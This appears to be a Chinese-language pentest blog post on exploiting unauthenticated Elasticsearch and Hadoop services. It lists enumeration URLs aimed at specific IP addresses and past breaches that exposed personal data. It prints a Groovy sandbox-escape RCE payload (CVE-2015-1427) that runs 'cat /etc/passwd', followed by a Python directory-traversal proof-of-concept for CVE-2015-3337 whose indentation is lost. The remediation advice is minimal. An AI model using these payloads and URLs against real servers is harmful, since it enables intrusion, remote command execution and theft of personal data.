ElasticSearch未授权访问的检测与利用思路

基本说明

VulBOX
https://book.thief.one/webying-yong-lou-dong/136-elasticsearchwei-shou-quan-fang-wen-lou-dong.html

延伸阅读

https://www.ichunqiu.com/course/1413

Redis未授权访问
其他 NoSQL未授权访问
MongoDB、Redis、ES、Memcached、Hadoop

漏洞描述

ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放9200端口,可被非法操作数据。

漏洞检测

默认端口 9200 HTTP协议
返回内容中包含”You Know, for Search”

(另外,AWVS也可发现)

一般来说,出现这种问题的多数是默认配置的ElasticSearch
(粗检只考虑9200,如果是作为甲方那还是要所有端口过一遍)
所以只要检测9200就好了,如果端口不在9200,通常说明运维、开发者可能已经在考虑一些安全性问题,也就没必要深究了。

一些利用的URL

节点URL

 
       
1
2
3
4
5
6
7
8
 
       
http: //101.198.161.130:9200/_cat/indices/
http: //101.198.161.130:9200/_plugin/head/
http: //101.198.161.130:9200/_nodes
http: //101.198.161.130:9200/_nodes?prettify
http: //101.198.161.130:9200/_status
http: //101.198.161.130:9200/_search?pretty
http: //10.203.9.131:9200/zjftu/
http: //10.203.9.131:9200/zjftu/_search?pretty

Hadoop未授权访问

 
       
1
2
 
       
http: //103.15.200.81:50070/dfshealth.jsp
http: //103.15.200.81:50070/logs/

漏洞危害

可被非法操作数据,对网站数据造成影响。

修复方案

1.关闭9200端口
2.防火墙上设置禁止外网访问此端口。

历史事件漏洞

安全脉搏搜索
乌云镜像搜索
CNVD搜索

1 360手机一处Elasticsearch未授权访问 (2016-04-19)
https://www.secpulse.com/archives/46394.html

2 暴风某站Elasticsearch未授权访问&Hadoop未授权访问(2016-04-27)
https://www.secpulse.com/archives/49115.html

3 新华网某频道服务器一处Elasticsearch配置不当/可任意操作/涉及被采访人员信息(2016-03-19)
https://www.secpulse.com/archives/46976.html

(ElasticSearch RCE)
4 神器而已证券系列之九州证券某站Elasticsearch远程代码执行漏洞(2015-09-11 18:30)
(内含少量内网套路)
https://www.secpulse.com/archives/39822.html

5 风行某站Elasticsearch配置不当(任意文件读取)
https://www.secpulse.com/archives/41126.html

6 上海某服务器一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(790多W用户姓名\身份证号\民族\开房时间\退房时间\房间号等)(2016-03-16)
https://www.secpulse.com/archives/46801.html

7 广西移动一处Elasticsearch配置不当/可任意操作/涉及大量敏感信息(用户手机号码/IMEI/IMSI/上网时间/地点等)
https://www.secpulse.com/archives/46798.html

ElasticSearch Groovy RCE (CVE-2015-1427)

影响范围
The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.

对一下链接进行一个POST

http://127.0.0.1:9200/_search?pretty

POST的data域如下

 
       
1
 
       
{ "size": 1, "script_fields": { "iswin": { "script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()", "lang": "groovy"}}}

几个其他Exp

https://www.waitalone.cn/elasticsearch-exp.html
https://www.waitalone.cn/elasticsearch.html
http://www.freebuf.com/sectool/38025.html
http://blog.csdn.net/u011066706/article/details/51175761

es_poc_1.py

 
       
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
 
       
#!/usr/bin/env python
#-*- coding:utf- 8 -*-
import requests
host= "10.203.9.131"
port = 9200
def elastic_directoryTraversal(host,port):
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
pList = ['/../../../../../../../../../../../../../../etc/passwd','/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/etc/passwd','/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/ %c0 %ae %c0 %ae/windows/win.ini']
for p in pluginList:
for path in pList:
urlA = "http://%s:%d/_plugin/%s%s" % (host,port,p,path)
try:
content = requests.get(urlA,timeout= 5,allow_redirects=True,verify=False).content
print content
print "\n-------------------------------------------------------------\n"
if "/root:/" in content:
print 'Elasticsearch 任意文件读取漏洞(CVE- 2015- 3337) Found!'
except Exception,e:
print e
elastic_directoryTraversal(host,port)

你可能感兴趣的:(渗透测试)